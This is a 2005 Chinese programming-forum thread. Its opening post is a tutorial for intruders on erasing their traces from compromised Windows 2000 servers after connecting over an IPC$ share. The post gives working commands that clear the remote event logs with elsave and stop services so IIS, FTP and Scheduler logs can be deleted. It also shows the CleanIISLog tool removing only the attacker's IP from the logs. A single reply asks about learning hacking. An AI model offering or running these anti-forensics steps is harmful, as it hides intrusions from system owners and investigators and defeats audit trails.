| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 378 人关注过本帖
标题:小黑必学:简单黑客工具的使用
只看楼主 加入收藏
303788766
Rank: 1
等 级:新手上路
帖 子:167
专家分:0
注 册:2005-8-19
收藏
 问题点数:0 回复次数:1 
小黑必学:简单黑客工具的使用
  1.小榕的elsave清除日志的使用:

  先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""

  清除目标系统的应用程序日志:

  elsave -s \\ip -l "application" -C

  清除目标系统的系统日志:

  elsave -s \\ip -l "system"" -C

  清除目标系统的安全日志:

  elsave -s \\ip -l "security" -C

  

  2.windows2000日志的清除:

  www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.

  win2000中的其他一些日志:

  安全日志:%winsystem%\system32\config\Secevent.evt

  应用程序日志:%winsystem%\system32\config\AppEvent.evt

  系统日志:%winsystem%\system32\config\SysEvent.evt

  IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志

  IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志

  Scheduler服务日志:%winsystem%\schedlgu.txt

  注册表所在项目:

  [HKLM]\system\CurrentControlSet\Services\Eventlog

  Schedluler服务注册表所在项目:

  [HKLM]\SOFTWARE\Microsoft\SchedulingAgent

  如果日志被从新定位,路径在注册表里面有记录.

  
清除日志

  清除日志必须先停掉相关的服务后才能进行:

  www和ftp日志必须想停w3svc: net stop w3svc

  然后就可在相关日志目录下面把你想要删除的日志删除.

  Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"

  系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.

  也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:

  cleaniislog [logfile] [.] [cleanIP] .

  说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录

  举例:cleaniislog . 127.0.0.1

  A.可以清除指定的的IP连接记录,保留其他IP记录。

  B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。

  用法: CleanIISLog  <.>  <.>

  : 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。

  : 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。

  CleanIISLog只能在本地运行,而且必须具有Administrators权限。
搜索更多相关主题的帖子: 工具 黑客 
2005-11-29 10:22
IT_BoBo
Rank: 1
等 级:新手上路
帖 子:623
专家分:0
注 册:2005-11-1
收藏
得分:0 
想學黑客.網絡安全技術熟悉嗎?

……吹、吹、吹个大气球,吹大了气球玩球球……
2005-11-29 14:25
快速回复:小黑必学:简单黑客工具的使用
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.035034 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved